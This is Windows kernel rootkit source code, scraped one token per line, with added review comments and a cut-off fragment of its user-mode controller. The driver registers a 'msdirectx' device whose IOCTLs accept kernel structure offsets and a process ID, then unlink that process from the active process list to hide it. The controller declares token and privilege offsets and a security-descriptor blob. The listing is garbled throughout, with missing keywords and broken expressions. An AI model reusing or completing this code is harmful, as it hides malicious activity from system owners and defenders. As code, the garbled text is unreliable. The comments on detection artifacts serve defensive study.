// Kernel-driver side: type aliases, IOCTL codes, device names and prototypes.
// NOTE(review): the page shows one token per line and several tokens are
// missing (the #define keyword before IOCTL_ROOTKIT_HIDEME, the return types
// of the prototypes); nothing below is reconstructed.
typedef
BOOLEAN
BOOL;
unsigned
long
DWORD;
DWORD
*
PDWORD;
// Custom device type plus two METHOD_BUFFERED control codes
// (function 0x01 = init, 0x02 = hide), both requiring FILE_WRITE_ACCESS.
#define
FILE_DEVICE_ROOTKIT
0x00002a7b
IOCTL_ROOTKIT_INIT
(ULONG)
CTL_CODE(FILE_DEVICE_ROOTKIT,
0x01,
METHOD_BUFFERED,
FILE_WRITE_ACCESS)
IOCTL_ROOTKIT_HIDEME
0x02,
// Byte offsets applied to the PsGetCurrentProcess() pointer; both are set at
// runtime from the IOCTL_ROOTKIT_INIT buffer, never validated by the driver.
int
FLINKOFFSET;
PIDOFFSET;
PDEVICE_OBJECT
g_RootkitDevice;
// Fixed device and symbolic-link names. Because they are constants, the
// object-namespace entries they create are straightforward artifacts for
// defenders to look for.
const
WCHAR
deviceLinkBuffer[]
=
L"
\\DosDevices\\msdirectx"
;
deviceNameBuffer[]
\\Device\\msdirectx"
DebugPrint
DbgPrint
// Walks the process list looking for the process whose ID is given (defined below).
FindProcessEPROC(int);
// function that walks the linked list to find the process to hide
NTSTATUS
RootkitDispatch(IN
PDEVICE_OBJECT,
IN
PIRP);
RootkitUnload(IN
PDRIVER_OBJECT);
RootkitDeviceControl(IN
PFILE_OBJECT,
BOOLEAN,
PVOID,
ULONG,
OUT
PIO_STATUS_BLOCK,
PDEVICE_OBJECT
);
// Driver entry point. Creates the control device (type FILE_DEVICE_ROOTKIT),
// creates the DosDevices symbolic link, and routes CREATE/CLOSE/SHUTDOWN/
// DEVICE_CONTROL IRPs to RootkitDispatch; RootkitUnload is the unload routine.
// NOTE(review): the function returns STATUS_SUCCESS even on the else branch
// where IoCreateDevice failed (only a debug print is emitted), so the I/O
// manager keeps a driver image loaded that has no device object.
DriverEntry(
PDRIVER_OBJECT
DriverObject,
PUNICODE_STRING
RegistryPath
)
{
ntStatus;
UNICODE_STRING
deviceNameUnicodeString;
deviceLinkUnicodeString;
// Build the two UNICODE_STRINGs from the constant name buffers above.
RtlInitUnicodeString
(&
deviceNameUnicodeString,
deviceNameBuffer
deviceLinkUnicodeString,
deviceLinkBuffer
ntStatus
IoCreateDevice
(
0,
//
For
driver
extension
&
FILE_DEVICE_ROOTKIT,
0,
TRUE,
g_RootkitDevice
if(
NT_SUCCESS(ntStatus))
// Only one argument survives on the page; IoCreateSymbolicLink takes the
// link name and the device name — TODO confirm against the original listing.
IoCreateSymbolicLink
deviceNameUnicodeString
// All four major functions share one dispatch routine.
DriverObject->
MajorFunction[IRP_MJ_SHUTDOWN]
=
MajorFunction[IRP_MJ_CREATE]
MajorFunction[IRP_MJ_CLOSE]
MajorFunction[IRP_MJ_DEVICE_CONTROL]
RootkitDispatch;
DriverUnload
RootkitUnload;
}
else
DebugPrint(("
Failed
to
create
device!
\n"
));
// Unconditional success — see the note above.
return
STATUS_SUCCESS;
// Unload routine (the name/type line is lost on the page; by its body and
// the RootkitUnload prototype above this is the DriverUnload handler).
// Removes the symbolic link and deletes the device if one was created.
DriverObject)
p_NextObj;
p_NextObj
DeviceObject;
if
(p_NextObj
!
NULL)
RtlInitUnicodeString(
deviceLinkUnicodeString,
IoDeleteSymbolicLink(
deviceLinkUnicodeString
IoDeleteDevice(
DeviceObject
// Common IRP dispatch. Initialises IoStatus to success/0, pulls the buffered
// I/O parameters out of the current stack location, and for
// IRP_MJ_DEVICE_CONTROL forwards them to RootkitDeviceControl; every IRP is
// completed with IO_NO_INCREMENT. CREATE/CLOSE/SHUTDOWN just complete.
// NOTE(review): the assignment of RootkitDeviceControl's return value and
// the `return` statement are not visible on the page — do not infer them.
RootkitDispatch(
DeviceObject,
PIRP
Irp
PIO_STACK_LOCATION
irpStack;
PVOID
inputBuffer;
outputBuffer;
ULONG
inputBufferLength;
outputBufferLength;
ioControlCode;
ntstatus;
ntstatus
Irp->
IoStatus.Status
IoStatus.Information
0;
irpStack
IoGetCurrentIrpStackLocation
(Irp);
// METHOD_BUFFERED: input and output share Irp->AssociatedIrp.SystemBuffer.
inputBuffer
AssociatedIrp.SystemBuffer;
inputBufferLength
irpStack->
Parameters.DeviceIoControl.InputBufferLength;
outputBuffer
outputBufferLength
Parameters.DeviceIoControl.OutputBufferLength;
ioControlCode
Parameters.DeviceIoControl.IoControlCode;
switch
(irpStack->
MajorFunction)
case
IRP_MJ_CREATE:
break;
IRP_MJ_SHUTDOWN:
IRP_MJ_CLOSE:
IRP_MJ_DEVICE_CONTROL:
RootkitDeviceControl(
FileObject,
inputBuffer,
inputBufferLength,
outputBuffer,
outputBufferLength,
ioControlCode,
IoStatus,
IoCompleteRequest(
Irp,
IO_NO_INCREMENT
// IOCTL handler.
//   IOCTL_ROOTKIT_INIT   : stores two caller-supplied ints as PIDOFFSET and
//                          FLINKOFFSET (requires a non-NULL buffer of enough bytes).
//   IOCTL_ROOTKIT_HIDEME : takes a DWORD process ID, locates its process block
//                          via FindProcessEPROC and unlinks its LIST_ENTRY from
//                          the neighbouring entries.
// Returns the status it stored in IoStatus->Status.
// NOTE(review): only InputBufferLength and the NULL pointer are checked. The
// offsets and the resulting kernel pointers are never range-checked, so any
// client allowed to open the device decides which kernel addresses the
// Flink/Blink stores below touch. The device object's ACL is the only access
// control visible, which is the main risk a reviewer should record.
NTSTATUS
RootkitDeviceControl(
PFILE_OBJECT
Wait,
InputBuffer,
InputBufferLength,
OutputBuffer,
OutputBufferLength,
IoControlCode,
PIO_STATUS_BLOCK
)
find_PID
eproc
0x00000000;
start_eproc=
PLIST_ENTRY
plist_active_procs
NULL;
IoStatus->
Status
Information
IoControlCode
IOCTL_ROOTKIT_INIT:
// Size check; the exact expression is garbled on the page (sizeof(int) ... 8).
((InputBufferLength
<
sizeof(int)
8)
||
(InputBuffer
==
NULL))
STATUS_INVALID_BUFFER_SIZE;
PIDOFFSET
(int)
(*(int
*)InputBuffer);
// get PIDOFFSET and FLINKOFFSET from user space
FLINKOFFSET
(*((int
*)InputBuffer+1));
IOCTL_ROOTKIT_HIDEME:
sizeof(DWORD))
*((DWORD
// get the ID of the process to hide from the user-space program
(find_PID
0x00000000)
STATUS_INVALID_PARAMETER;
FindProcessEPROC(find_PID);
// locate the corresponding process block by its ID
(eproc
(LIST_ENTRY
*)
(eproc+FLINKOFFSET);
// Unlink: point the predecessor's Flink and the successor's Blink past this
// entry. Only the list links change; the process block, its threads and its
// handle-table entries remain, which is what cross-view detection
// (comparing list walks against other enumeration sources) relies on.
*)plist_active_procs->
Blink)
(DWORD)
plist_active_procs->
Flink;
Flink+1)
Blink;
default:
STATUS_INVALID_DEVICE_REQUEST;
Status;
// Walks the process list starting at the current process, comparing the
// value at eproc+PIDOFFSET with terminate_PID. Returns the matching eproc;
// the return value for the "wrapped around to start_PID" case is lost on
// the page. A non-positive terminate_PID is rejected up front.
// NOTE(review): no lock or object reference is taken while chasing
// eproc+FLINKOFFSET, and the only loop bound is returning to the start PID;
// if a process exits during the walk the pointer chase can fault.
FindProcessEPROC
(int
terminate_PID)
current_PID
start_PID
i_count
plist_active_procs;
(terminate_PID
0)
terminate_PID;
PsGetCurrentProcess();
// start from the current process (the original comment calls this its PLIST_ENTRY;
// PsGetCurrentProcess() actually yields the process block pointer)
*((DWORD*)(eproc+PIDOFFSET));
// PIDOFFSET is the offset at which the process ID is stored (relative to eproc)
start_PID;
while
(1)// walk the list comparing process IDs to find the list entry of the process to hide
if(terminate_PID
current_PID)
eproc;
// Stop once the walk has come back around to the starting process.
if((i_count
>
1)
(start_PID
current_PID))
// Advance to the next entry (the expression is garbled on the page; the
// surviving `-` suggests the Flink is converted back to a block pointer
// by subtracting FLINKOFFSET — TODO confirm) and re-read its PID.
-
*((int
*)(eproc+PIDOFFSET));
i_count++;
2
用户空间程序
// ---- Part 2: user-mode program (fragment) ----
// NOTE(review): the page has lost the `#include "`/`#include <` prefixes on the
// header lines and the `#define` keyword on the four constants below, and the
// listing stops in the middle of g_szSecurity. Nothing is reconstructed here.
stdafx.h"
windows.h>
stdio.h>
process.h>
tlhelp32.h>
string.h>
winioctl.h>
winsvc.h>
tchar.h>
stdlib.h>
// Constants (by their names: security-blob length, a page size, a key-name
// bound and a sleep interval in ms — only SECURITY_STRING_LEN is used on the page).
SECURITY_STRING_LEN
168
LG_PAGE_SIZE
4096
MAX_KEY_LENGTH
1024
LG_SLEEP_TIME
4000
// Presumably the handle to the driver's control device; the open call is not on the page.
HANDLE
gh_Device
INVALID_HANDLE_VALUE;
// Service label and driver file name. Both are fixed strings, so the on-disk
// file, the service entry and the loaded-driver name are stable indicators
// defenders can look for (winsvc.h is included; the install code is not shown).
static
CHAR
ac_driverLabel[]="
msdirectx"
ac_driverName[]="
msdirectx.sys"
pid;
h_Device
d_bytesRead,
d_error;
ac_driverPath[MAX_PATH];
BOOL
bOsVersionInfoEx;
Found
FALSE;
acModulePath[MAX_PATH];
// Field offsets sent to the driver. Only pid_offset and flink_offset match
// what the kernel code on this page consumes; the token/privilege/SID
// offsets are declared but nothing visible uses them.
pid_offset
flink_offset
authid_offset
token_offset
privcount_offset
privaddr_offset
sidcount_offset
sidaddr_offset
char
m_szDriverExt[MAX_PATH];
DriverName[MAX_PATH];
sz_drivername[MAX_PATH];
m_szDriverFullPath[MAX_PATH];
// Snapshot entry for the tlhelp32 process enumeration (usage not on the page).
PROCESSENTRY32
stProcess;
// Raw SECURITY_STRING_LEN-byte blob. Its leading bytes (revision 0x01,
// control 0x8014) look like a self-relative SECURITY_DESCRIPTOR — TODO
// confirm against the code that consumes it, which is not on the page.
// Only 149 initializers are visible; the listing is cut off here.
BYTE
g_szSecurity[SECURITY_STRING_LEN]=
0x01,0x00,0x14,0x80,0x90,0x00,0x00,0x00,0x9c,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,
0x00,0x1c,0x00,0x01,0x00,0x00,0x00,0x02,0x80,0x14,0x00,0xff,0x01,0x0f,0x00,0x01,0x01,0x00,0x00,0x00,0x00,
0x00,0x01,0x00,0x00,0x00,0x00,0x02,0x00,0x60,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0xfd,0x01,0x02,
0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x12,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0xff,0x01,0x0f,0x00,
0x01,0x02,0x00,0x00,0x00,0x00,0x00,0x05,0x20,0x00,0x00,0x00,0x20,0x02,0x00,0x00,0x00,0x00,0x14,0x00,0x8d,
0x01,0x02,0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x0b,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0xfd,0x01,
0x02,0x00,0x01,0x02,0x00,0x00,0x00,0x00,0x00,0x05,0x20,0x00,0x00,0x00,0x23,0x02,0x00,0x00,0x01,0x01,0x00,
0x00,0x00